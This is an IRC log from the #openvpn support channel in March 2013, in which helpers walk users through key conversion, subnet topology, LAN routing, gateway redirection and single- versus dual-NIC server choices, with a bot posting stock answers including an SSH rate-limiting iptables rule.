15:09 < cafaroo> I dont know i sent him my putty key and he sent me back a zip file containing 4files. The crt files and some config files and the .key file. 15:10 < pekster> You shouldn't have sent your private key out, although if you did hopefully it was at least encrypted 15:10 < pekster> If it's been signed by the CA you're using, just use that private key, signed cert, and the ca.crt files and you're done 15:11 < pekster> I don't know how your signing process works internally, so I can't say if this was done properly or not 15:12 < cafaroo> I know but he took the access away from the servers since i told him to create new keys so i cant access them but that one works logging in to the vpn.. 15:13 < cafaroo> Sorry I cant even understand what i wrote there myself. Those keys work but i cant access our internal servers with those since i told him to create new ones. So with the new ones i can access the servers if i can only convert them witch seem impossible. 15:14 < cafaroo> So ill contact him tomorrow and treat him with a cookie or something to change it back to the inital configuration. 15:14 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 245 seconds] 15:14 < pekster> Yea, you'd best do that. I have no clue what you're trying to "convert" 15:15 < cafaroo> My friend, from what i've wrote i hope you understand that i really dont know that either. :P 15:15 -!- catsup [~d@64.111.123.163] has joined #openvpn 15:15 < pekster> putty's ".ppk" files are not OpenSSH compatible, but the puttyGen program does let you convert them 15:16 < pekster> It's still all meaningless unless you somehow integrate that into a CSR and signing process 15:16 < cafaroo> But there is a button in puttygen that says convert to openssh? 15:16 < pekster> In the 'Conversions' menu, yes 15:16 < cafaroo> But it dosent work? 15:16 < pekster> It works fine. You load a .ppk file and then export the openssh formatted keypair 15:17 < pekster> Or just use a proper tool to generate a keypair for openvpn that does the generation and CSR creation for you 15:17 < pekster> (that's better, becuase you're not likely to get help here turning your keypair into a CSR. That's an "experts only" thing as far as #openvpn cares) 15:18 * pekster needs to do a writeup on this sometime 15:18 < cafaroo> pkster:ahh well ive already put engouh time in this better call him tomorrow.... 15:19 < cafaroo> Thanks again. 15:21 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 264 seconds] 15:21 -!- catsup [~d@64.111.123.163] has joined #openvpn 15:22 -!- levifig [~levifig@spwn.co] has quit [Excess Flood] 15:22 -!- levifig [~levifig@spwn.co] has joined #openvpn 15:27 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 256 seconds] 15:27 -!- catsup [~d@64.111.123.163] has joined #openvpn 15:32 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 256 seconds] 15:33 -!- catsup [~d@64.111.123.163] has joined #openvpn 15:33 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 240 seconds] 15:38 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 264 seconds] 15:39 -!- catsup [~d@64.111.123.163] has joined #openvpn 15:44 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 15:44 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 250 seconds] 15:45 -!- catsup [~d@64.111.123.163] has joined #openvpn 15:46 -!- jgeboski- [~jgeboski@unaffiliated/jgeboski] has joined #openvpn 15:47 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 15:48 -!- kli0rf [kli0rf@unaffiliated/kli0rf] has joined #openvpn 15:50 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 250 seconds] 15:51 -!- eHAPPY [~V1CE@ip174-73-3-95.no.no.cox.net] has quit [Ping timeout: 245 seconds] 15:51 -!- catsup [~d@64.111.123.163] has joined #openvpn 15:53 < kli0rf> evening 15:54 < kli0rf> gotta little problem, i've got set up openvpn server, and it works, but only allows one client to be connected 15:54 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 272 seconds] 15:54 < kli0rf> when second client is connecting, error says there's no free ips left for the second client 15:54 < kli0rf> here's configs: http://www.codepaste.eu/?hash=57937e7e11d13fea0b1c31eacc0cb3d5 15:55 < kli0rf> anyone has a clue..? 15:56 < pekster> kli0rf: You probably want the 'toplogy subnet' with a netework range that small 15:56 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 256 seconds] 15:56 < pekster> !/30 15:56 <@vpnHelper> "/30" is (#1) Default behaviour assigns a /30 subnet(4 addresses) to each peer. See http://goo.gl/6vemm for background or (#2) you can avoid this behavior by reading !topology or (#3) by default, first client is .6, then .10 .14 .18 etc or (#4) use openvpn --show-valid-subnets to see the subnets you can use in net30 or (#5) tl;dr Windows sucks, use --topology subnet in your server.conf 15:57 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 252 seconds] 15:57 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 15:57 < kli0rf> hmmm 15:57 < pekster> Optionally use a larger subnet instead of a /29; you're using rfc1918 space anyway in that example, so it's not like you need to conserve public IPv4 IPs or something 15:58 -!- catsup [~d@64.111.123.163] has joined #openvpn 15:58 < pekster> In net30, a /29 gives you just 1 /30 for the server and another for a single client. In subnet mode, you'll get up to 5 clients plus the server 15:59 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 15:59 < pekster> PtP mode could increase utilization by allowing you to use say .0 for the server and .1 through .7 for clients since there's no notion of a "network" or "broadcast" address in a true PtP interface. Note that this is incompabible with Windows clients 16:00 < pekster> Pick some combination of the above to fix your issue 16:01 < kli0rf> pekster: so increasing dhcp range, e.g. /28, would do the thing in this case? 16:01 < pekster> The "quick" fix is to just use topology subnet 16:01 -!- eHAPPY [~V1CE@ip174-73-3-95.no.no.cox.net] has joined #openvpn 16:01 < pekster> Do you need >5 clients? 16:01 < kli0rf> pekster: nope, i need just five :) 16:02 -!- JSharpe [~JSharpe@46.165.221.13] has quit [Quit: Leaving] 16:02 < pekster> Then your current setup works fine if you use topolgoy subnet. Connecting more clients would require a larger subnet (or PtP trickery, but it looks like your client config is Windows, so that's not valid there) 16:03 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 252 seconds] 16:03 < kli0rf> i see... 16:03 < pekster> You'll be unable to add more clients beyond 5 even using subnet topology unless you allocate more than a /29. Any reason you're using such a small network in private address space? 16:03 < pekster> 192.168/16 is a bit place... 16:03 < pekster> big* 16:04 -!- catsup [~d@64.111.123.163] has joined #openvpn 16:04 < rob0> I can sell you a chunk of 10/8, or or 172.16/12! 16:05 -!- KaiForce [~chatzilla@adsl-70-228-81-145.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 19.0/20130215130331]] 16:05 < kli0rf> pekster: no particular reason, just for the sake of clarity. i only need five clients, so it looked like a good idea to use subnet which only can have five clients... 16:06 -!- flashuni [~textual@108-241-244-170.lightspeed.frokca.sbcglobal.net] has joined #openvpn 16:07 < pekster> Sure, then subnet is the way to go 16:07 < pekster> It's just an odd design decision when you're talking about the (nearly) limitless addressing you have in rfc1918 16:07 < pekster> If that ever changes and you need a 6th client, you need to re-do the network topology and expand it 16:08 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:09 < pekster> rob0: How about I trade you some fd00::/8 space for that :D 16:09 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 276 seconds] 16:09 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 16:09 -!- mode/#openvpn [+o krzee] by ChanServ 16:10 < kli0rf> pekster: hmmm, my real network is 192.168.1.0/28, and this 192.168.2.0/29 is only for openvpn clients 16:10 -!- catsup [~d@64.111.123.163] has joined #openvpn 16:10 < pekster> Right. Why not assign 192.168.2.0/24 for VPN clients? 16:11 < pekster> It's just a silly design practice to cripple your networks with painfully small netmasks that get expanded if/when utilization increases 16:12 < kli0rf> pekster: i see. ok, let me assign 192.168.2.0/24. do i still need 'topology subnet' in server config? 16:13 < pekster> You wouldn't need it since you can fit 64 unique /30's inside a /24, but I'd still recommend it unless you actually need to support OpenVPN clients older than version 2.1. Those clients are over 6 years old now 16:14 < kli0rf> i see 16:15 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 260 seconds] 16:16 < pekster> Here's an example of how a net30 split looks with a /29 and a /24, generated with the 'sipcalc' tool (it'll eat both CIDR and netmasks) http://paste.kde.org/689924/ 16:16 -!- catsup [~d@64.111.123.163] has joined #openvpn 16:17 < pekster> The "--show-subnets" flag to openVPN generates much the same output. 'topology subnet' does the sane thing and simply assigns each client a single IP and the netmask of the network 16:19 < pekster> --show-valid-subnets I guess 16:19 < pekster> (shows how often I use that feature :) 16:20 < kli0rf> :) 16:21 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 260 seconds] 16:22 -!- catsup [~d@64.111.123.163] has joined #openvpn 16:22 < pekster> I've only once in recent years needed to support a client as old as 2.0.9, and that was a fully Linux/Unix setup where we just used PtP on our public IPv4 assingments for up to 100% utilization on IP space 16:23 < pekster> Unless you're doing something really exotic, 'topology subnet' is the *strongly* recommended choice 16:24 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 16:27 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 245 seconds] 16:28 -!- catsup [~d@64.111.123.163] has joined #openvpn 16:29 < kli0rf> hmmmm 16:30 < kli0rf> i can't access samba share using it's ip address with topology subnet :/ 16:32 -!- jgeboski- is now known as jgeboski 16:33 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 16:33 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 245 seconds] 16:34 < pekster> If you can ping the peer you're trying to reach, it's not an openvpn issue. DNS likely. If you can't ping, it's usually a firewall issue 16:34 -!- catsup [~d@64.111.123.163] has joined #openvpn 16:34 < kli0rf> i can't ping 16:36 < kli0rf> i've left subnet 192.168.2.0/29 and just added 'topology subnet' to server config, so my client connects, reports that it got 192.168.2.2 ip, but i can't ping to 192.168.1.0/28 hosts... 16:37 < rob0> !serverlan 16:37 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 16:40 -!- smerz [~smerz@a177088.upc-a.chello.nl] has quit [Remote host closed the connection] 16:40 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Quit: Yippee-kay-yay] 16:40 -!- catsup [~d@64.111.123.163] has quit [Read error: Connection reset by peer] 16:40 -!- catsup [~d@64.111.123.163] has joined #openvpn 16:40 -!- ducblangis [~desade@24-117-207-111.cpe.cableone.net] has left #openvpn ["WeeChat 0.3.8"] 16:41 -!- Porkepix [~Porkepix@157.138.76.100] has quit [Quit: Computer has gone to sleep.] 16:42 < kli0rf> i have ip forwarding enabled 16:42 < rob0> Use the flowchart, Luke. 16:42 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 16:46 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 276 seconds] 16:46 < eHAPPY> !route_outside_openvpn 16:46 <@vpnHelper> "route_outside_openvpn" is (#1) If your server is not the default gateway for the LAN, you will need to add routes to your gateway. See ROUTES TO ADD OUTSIDE OPENVPN in !route or (#2) Here are 2 diagrams that explain how this works: http://www.secure-computing.net/wiki/index.php/Graph http://i.imgur.com/BM9r1.png 16:47 -!- catsup [~d@64.111.123.163] has joined #openvpn 16:47 < eHAPPY> wow this channel has more/better info that the openvpn docs itself lolf 16:49 < eHAPPY> can someone link me to a install walkthrough? im having a really hard time setting this up to connect from outside my lan 16:49 <@krzee> actually thats also on community.openvpn.net 16:49 <@krzee> eHAPPY, 16:49 <@krzee> !goal 16:49 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 16:50 < eHAPPY> i was to setup a basic vpn, clients connect to it and routes data over and through my local internet 16:50 <@krzee> you want to redirect the client's internet to come from the server? 16:50 < eHAPPY> right, a very basic vpn 16:51 <@krzee> thats not as basic as you think 16:51 <@krzee> !redirect 16:51 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 16:51 <@vpnHelper> http://ircpimps.org/redirect.png 16:51 < eHAPPY> maybe im not wording it properly then 16:51 <@krzee> well it is, but it requires stuff outside openvpn 16:51 <@krzee> namely, enabling ip forwarding and NATing your vpn subnet 16:51 < eHAPPY> i want the most basic VPN setup, client connect to it and can use the servers internet 16:51 <@krzee> all a vpn does is connect 2 machines 16:51 < eHAPPY> yeah 16:52 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 256 seconds] 16:52 <@krzee> the most basic vpn is simply a ptp between 2 machines 16:52 <@krzee> you want that, and to route all internet over it 16:52 < eHAPPY> oh alright, i figured that was a given 16:52 <@krzee> which is easy, you just do this 16:52 <@krzee> !redirect 16:52 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 16:52 <@vpnHelper> http://ircpimps.org/redirect.png 16:52 <@krzee> what OS is your server? 16:53 < eHAPPY> im trying to run it as the vmware appliance 16:53 -!- catsup [~d@64.111.123.163] has joined #openvpn 16:53 < eHAPPY> but really i dont care as long as it finally works 16:53 <@krzee> that was not an answer 16:53 <@krzee> what OS 16:53 < eHAPPY> umm i think its debian 16:53 <@krzee> ok 16:53 <@krzee> linux 16:53 <@krzee> :-p 16:53 < eHAPPY> yeah 16:53 <@krzee> want a program that will hold your hand and tell you what to do by asking you questions? 16:53 < eHAPPY> im thinking vmware adds another level of complication though 16:54 < eHAPPY> yeah that would be great 16:54 <@krzee> !confgen 16:54 <@vpnHelper> "confgen" is (#1) http://www.doeshosting.com/code/openvpn-confgen.tgz for the bash config generator or (#2) you can use svn co http://www.secure-computing.net/svn/trunk/openvpn-confgen/ or (#3) you must run this in bash 16:54 -!- Orbi [~opera@anon-147-110.vpn.ipredator.se] has left #openvpn [] 16:55 < eHAPPY> ok this will do all the NAT/redirect/etc for me? 16:58 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 260 seconds] 16:59 -!- catsup [~d@64.111.123.163] has joined #openvpn 17:00 -!- kli0rf [kli0rf@unaffiliated/kli0rf] has left #openvpn [] 17:04 -!- dxtr [cfc05a40@unaffiliated/dxtr] has quit [Ping timeout: 256 seconds] 17:04 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 272 seconds] 17:04 < Azrael_-> krzee: hi, perhaps you remember me from some days ago with the smb-problem in windows. i didn't change anything and it works now again. no idea why 17:05 <@krzee> eHAPPY, no, it will tell you what to do 17:05 -!- catsup [~d@64.111.123.163] has joined #openvpn 17:05 <@krzee> it does not assume you're running it on the server machine, and it should not be run as root anyways 17:06 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 17:09 -!- cafaroo [gustaf@c213-89-175-69.bredband.comhem.se] has quit [Ping timeout: 264 seconds] 17:10 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 255 seconds] 17:11 -!- catsup [~d@64.111.123.163] has joined #openvpn 17:14 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 240 seconds] 17:14 -!- nonotza [~nonotza@cpe-74-73-232-198.nyc.res.rr.com] has joined #openvpn 17:17 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 248 seconds] 17:17 -!- catsup [~d@64.111.123.163] has joined #openvpn 17:18 < eHAPPY> ok is there any easier to setup vpn software? this is killer for a simple lab setup lol 17:19 <@EugeneKay> It's plenty easy if you understand basic networking and PKI 17:19 < eHAPPY> i do but many of these questiosn dont even apply 17:20 < eHAPPY> im just wanting a self contained vpn appliance 17:20 < eHAPPY> dont need to branch out into my entire network 17:21 < pekster> The script your using is not part of OpenVPN proper, but a 3rd party script authored by the individual who handed it to you. When you use a "kitchen sink" type helper tool, it's presumably going to ask you any question that applies to a feature it supports 17:21 < pekster> Either use the helper-script as it was intended, or write your own config based on your needs 17:21 < eHAPPY> should i jsut put in garbage info for those parts? 17:23 < rob0> "self contained vpn appliance"? what would that do? It makes no sense. 17:23 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 256 seconds] 17:23 < eHAPPY> rob0 the openVPN appliance i would imagine 17:23 < eHAPPY> it runs great, just cant get a public IP working 17:23 -!- catsup [~d@64.111.123.163] has joined #openvpn 17:24 < pekster> "can't get a public IP working" ?? That doesn't describe a problem that I undersatnd 17:25 < eHAPPY> ok, my internal ip works just fine, i can route all the traffic i want to and through it 17:26 < eHAPPY> once i try and set it to public, set port forwarding, etc it doesnt work 17:26 < eHAPPY> the openvpn logs never get hit 17:26 < pekster> Then you have messed up your external routing or a firewall along the way 17:26 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has joined #openvpn 17:26 < eHAPPY> its all defaulted each time i try and set up 17:27 < pekster> Fix your firewalls and trace the packets using the standard tools for such problems, namely tcpdump and iptables on a Linux system 17:27 < eHAPPY> what all besides the openvpn software do i need to do? 17:27 < pekster> You need to do exactly what I just stated 17:27 < rob0> learn a lot more, I think :) 17:27 < eHAPPY> rob0 i would be fine if there was more documentation :/ 17:28 < rob0> !101 17:28 <@vpnHelper> "101" is This channel is not a '101' replacement for any of the following topics or others: Networking, Firewalls, Routing, Your OS, Security, etc etc 17:28 < eHAPPY> so where should i go to get help on my networking for openvpn? 17:28 < eHAPPY> is there a networking-openvpn channel? 17:28 < rob0> !tcpip 17:28 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know 17:28 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 255 seconds] 17:29 -!- catsup [~d@64.111.123.163] has joined #openvpn 17:33 < eHAPPY> im not seeing anything on proprietary vpns...what should i be looking for? 17:34 < pekster> 1) OpenVPN is not proprietary as it is released under the GPLv2. 2) your issue isn't even related to OpenVPN. Apparently your routing and/or firewall is misconfigured and as a result your VPN server never sees the packets the client sends 17:34 -!- dxtr [4574b2ad@unaffiliated/dxtr] has joined #openvpn 17:34 < pekster> It sounds like you need to learn some basic networking skills in order to diagnose and fix why that isn't working 17:35 < eHAPPY> pekster while that would be 3-5 hours well spent im just looking for a walkthrough guide 17:35 -!- catsup [~d@64.111.123.163] has quit [Read error: Connection reset by peer] 17:35 < eHAPPY> ie "once openvpn is running, configure your router to software port xx,xx and enable NAT" 17:35 -!- catsup [~d@64.111.123.163] has joined #openvpn 17:35 < eHAPPY> forward* 17:36 < pekster> !basic 17:36 <@vpnHelper> "basic" is if you do not understand basic networking, you probably should not be administrating a vpn... you should understand the basics of routing / firewalls first 17:37 -!- flashuni [~textual@108-241-244-170.lightspeed.frokca.sbcglobal.net] has quit [Quit: Computer has gone to sleep.] 17:38 < eHAPPY> like i said, its a home lab 17:39 < eHAPPY> ill jsut go with a l2tp/ipsec setup instead; worth spending 50$ not to deal with all this i guess 17:39 < pekster> That doesn't change the fact that you're struggling with a fairly basic networking concept that is outside the scope of using openvpn. It sounds like you've misconfigured your home router or your firewall on the OS/host 17:39 < eHAPPY> ...its defaulted like i said 17:40 < pekster> I don't have any clue what "defaulted" means. I don't know your home router, nor do I care to attempt to support it 17:40 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 255 seconds] 17:41 < pekster> OpenVPN is one of the easiest VPNs out there to configure through firewalls and NAT since it multiplexes all the communication over a single UDP (or TCP) port 17:41 < eHAPPY> default means all stock settings, nothing changed 17:41 -!- catsup [~d@64.111.123.163] has joined #openvpn 17:44 -!- vistas [~vistas@c-71-204-33-119.hsd1.ga.comcast.net] has quit [Ping timeout: 250 seconds] 17:47 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 260 seconds] 17:48 -!- catsup [~d@64.111.123.163] has joined #openvpn 17:53 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 250 seconds] 17:54 -!- catsup [~d@64.111.123.163] has joined #openvpn 17:59 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 245 seconds] 18:00 -!- catsup [~d@64.111.123.163] has joined #openvpn 18:06 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 255 seconds] 18:07 -!- catsup [~d@64.111.123.163] has joined #openvpn 18:12 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 245 seconds] 18:13 -!- catsup [~d@64.111.123.163] has joined #openvpn 18:18 < eHAPPY> figured it out 18:19 < eHAPPY> it was a problem with vmware -_- 18:25 -!- mete [~mete@mete.shell.la] has quit [Quit: .] 18:26 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 18:29 -!- RichardBronosky_ [~RichardBr@ec2-50-17-28-78.compute-1.amazonaws.com] has joined #openvpn 18:29 -!- Netsplit *.net <-> *.split quits: kyrix, Sickness\, Masxmasx, sejo, MeanderingCode, pulz, rob0, dropje, RichardBronosky, scoates 18:34 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 250 seconds] 18:39 -!- Netsplit over, joins: MeanderingCode, kyrix, pulz, dropje, Sickness\, rob0, sejo, scoates, Masxmasx 18:39 -!- Cr4zi3 [killaz@staff.xbins.org] has quit [Excess Flood] 18:39 -!- Cr4zi3 [killaz@staff.xbins.org] has joined #openvpn 19:01 -!- clu5ter [~staff@unaffiliated/clu5ter] has quit [Ping timeout: 240 seconds] 19:02 -!- clu5ter [~staff@unaffiliated/clu5ter] has joined #openvpn 19:18 -!- kisom [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] has quit [Ping timeout: 250 seconds] 19:27 -!- levifig [~levifig@spwn.co] has quit [Excess Flood] 19:28 -!- levifig [~levifig@spwn.co] has joined #openvpn 19:28 -!- levifig [~levifig@spwn.co] has quit [Excess Flood] 19:29 -!- levifig [~levifig@spwn.co] has joined #openvpn 19:30 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 256 seconds] 19:35 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 19:36 -!- gardar [~gardar@gardar.net] has quit [Remote host closed the connection] 19:40 -!- gardar [~gardar@gardar.net] has joined #openvpn 19:45 -!- raidz is now known as raidz_away 19:52 -!- kisom [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] has joined #openvpn 20:06 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 264 seconds] 20:09 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 20:10 -!- vistas [~vistas@c-71-204-33-119.hsd1.ga.comcast.net] has joined #openvpn 20:15 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 276 seconds] 20:16 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 20:51 -!- levifig [~levifig@spwn.co] has quit [Excess Flood] 20:53 -!- levifig [~levifig@spwn.co] has joined #openvpn 20:54 -!- rob0 [rob0@pdpc/valentine/postfixninja/rob0] has quit [Read error: Operation timed out] 20:59 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 21:00 -!- rob0 [rob0@harrier.slackbuilds.org] has joined #openvpn 21:00 -!- rob0 [rob0@harrier.slackbuilds.org] has quit [Changing host] 21:00 -!- rob0 [rob0@pdpc/valentine/postfixninja/rob0] has joined #openvpn 21:00 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 276 seconds] 21:03 -!- CowboyPride [~chatzilla@unaffiliated/cowboypride] has joined #openvpn 21:03 -!- goldkatze [~nobody@unaffiliated/goldkatze] has quit [] 21:03 < CowboyPride> I have a question. Under the best circumstances for hosting a OpenVPN Access Server behind a router, what is the recommended number of NIC interfaces. 21:05 < CowboyPride> Is there any benefit to having more than one physical interface for a server hosted behind a router on local network with port forwarding or DMZ router setup ? 21:06 -!- cafaroo [~gustaf@c213-89-175-69.bredband.comhem.se] has joined #openvpn 21:06 < pekster> !as 21:06 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server 21:07 < pekster> We deal with the open-source OpenVPN project (the GPL project.) Access Server is commercial and unsupported in this channel 21:09 -!- zach__ [~zach@nat-192-95-29-123.bhs1.montreal.qbc.ca.nuked.co] has left #openvpn [] 21:11 -!- cafaroo [~gustaf@c213-89-175-69.bredband.comhem.se] has quit [Ping timeout: 256 seconds] 21:13 < CowboyPride> Well the open source version is what I was looking at as well. It's a generic question to open vpn servers in general. Not limited toward the close source or open source versions. 21:14 < pekster> Other than some use-case with HA or failover, multiple physical NICs doesn't really do you any good 21:15 < pekster> If you support multiple subnets, another NIC could help connect to different ports on a switch (of course you can use 802.1q to the same effect with a single NIC too) 21:16 < pekster> OpenVPN abstracts the network connection in the form of a virtual tun or tap tunnel to your peer. How you get the packets there across the "real" network infrastructure is no different than dealing with web, or IRC, or any other form of IP traffic 21:21 <+soapee01> CowbowPride: http://en.wikipedia.org/wiki/Link_aggregation 21:21 <@vpnHelper> Title: Link aggregation - Wikipedia, the free encyclopedia (at en.wikipedia.org) 21:26 < CowboyPride> Ok thanks.. I was looking into purchasing a Ultra Slim Desktop for my VPN server but didn't know if I should get one with dual nics or single nic 21:27 -!- nonotza [~nonotza@cpe-74-73-232-198.nyc.res.rr.com] has quit [Quit: nonotza] 21:27 < pekster> Single-NIC is fine unless you have exotic needs like interface bonding, need to support a NIC failing on you, or something like that 21:28 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 260 seconds] 21:28 < CowboyPride> The only other reason I could think of having dual nics is if you were to host the VPN server on public internet if had multiple ips. 21:28 < CowboyPride> which I'm guessing is a a recommeded setup when security is a concern. 21:29 < pekster> There again, it depends on implementaion. I talked with a guy in another channel here that used a Ras Pi as his router by using VLAN tagging to a VLAN-aware switch, so there are always different solutions depending on your needs 21:31 < CowboyPride> I have been thinking about my setup an which way to go about it. I was thinking of either having my servers and my lan on the same subnet or separating my internal servers from my lan with a switch and then having the VPN server route traffic for them both for the local lan and remote vpn access. 21:31 < CowboyPride> The latter setup would a be a good learning experience I think... 21:32 < CowboyPride> And would allow me to segregate my internal servers from my home lan 21:32 < CowboyPride> but I really don't know... 21:33 < CowboyPride> I am wanting to experiment with OpenVPN and also give myself remote access to my lan and internal servers as well as provide a site-to-site vpn to my parents lan. 21:35 < CowboyPride> I could use LogMeIn vpn solution but I don't want to have to require my parents to leave their computer on all the time since they prefer to shut it off, but I could find other uses for the site-to-site vpn with a dedicate OpenVPN setup... 21:36 < CowboyPride> I've been thinking about it alot but haven't settled on how I want to go about my setup. 21:37 < CowboyPride> LogMeIn himachi though isn't what I want though, I prefer OpenVPN I think over himachi 21:39 < pekster> You're not likely to get the advice you're hoping for on how to architect your network here. ##networking might be more appropriate, but this channel is designed to provide OpenVPN-specific information 21:40 < CowboyPride> ok, thanks. 21:55 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 22:19 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 22:26 <@EugeneKay> !fail2ban 22:27 <@vpnHelper> "fail2ban" is in linux you can replace fail2ban without the background process with something like: iptables -A INPUT -m tcp -p tcp --dport 22 -m hashlimit --hashlimit-name ssh --hashlimit-upto 5/minute --hashlimit-mode srcip --hashlimit-srcmask 24 -j ACCEPT 22:48 -!- eHAPPY [~V1CE@ip174-73-3-95.no.no.cox.net] has quit [Read error: Connection reset by peer] 22:51 -!- eHAPPY [~V1CE@ip174-73-3-95.no.no.cox.net] has joined #openvpn 23:30 < Dennis84> good morning 23:40 -!- Orbi [~opera@93.182.147.76] has joined #openvpn 23:41 -!- Orbi [~opera@93.182.147.76] has left #openvpn [] --- Day changed Fri Mar 08 2013 00:09 -!- daemoen [~daemoen@216.245.201.138] has quit [Ping timeout: 250 seconds] 00:22 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Read error: Operation timed out] 00:25 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 00:41 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer] 00:43 < Dennis84> hi Wulf 00:43 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 00:45 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Remote host closed the connection] 00:45 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 01:05 -!- cafaroo [~gustaf@c80-216-25-207.bredband.comhem.se] has joined #openvpn 01:07 -!- novaflash is now known as novaflash_away 01:26 -!- novaflash_away is now known as novaflash 01:53 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection] 02:07 -!- ade_b [~Ade@koln-5d81459c.pool.mediaWays.net] has joined #openvpn 02:07 -!- ade_b [~Ade@koln-5d81459c.pool.mediaWays.net] has quit [Changing host] 02:07 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 02:10 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 02:24 -!- JackWinter [~jack@ppp-256.vo.lu] has left #openvpn ["Konversation terminated!"] 02:27 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 02:27 -!- dazo_afk is now known as dazo 02:37 -!- JackSparrow [~death@2001:41d0:1:d4e5:1234:1234:1234:1234] has quit [Ping timeout: 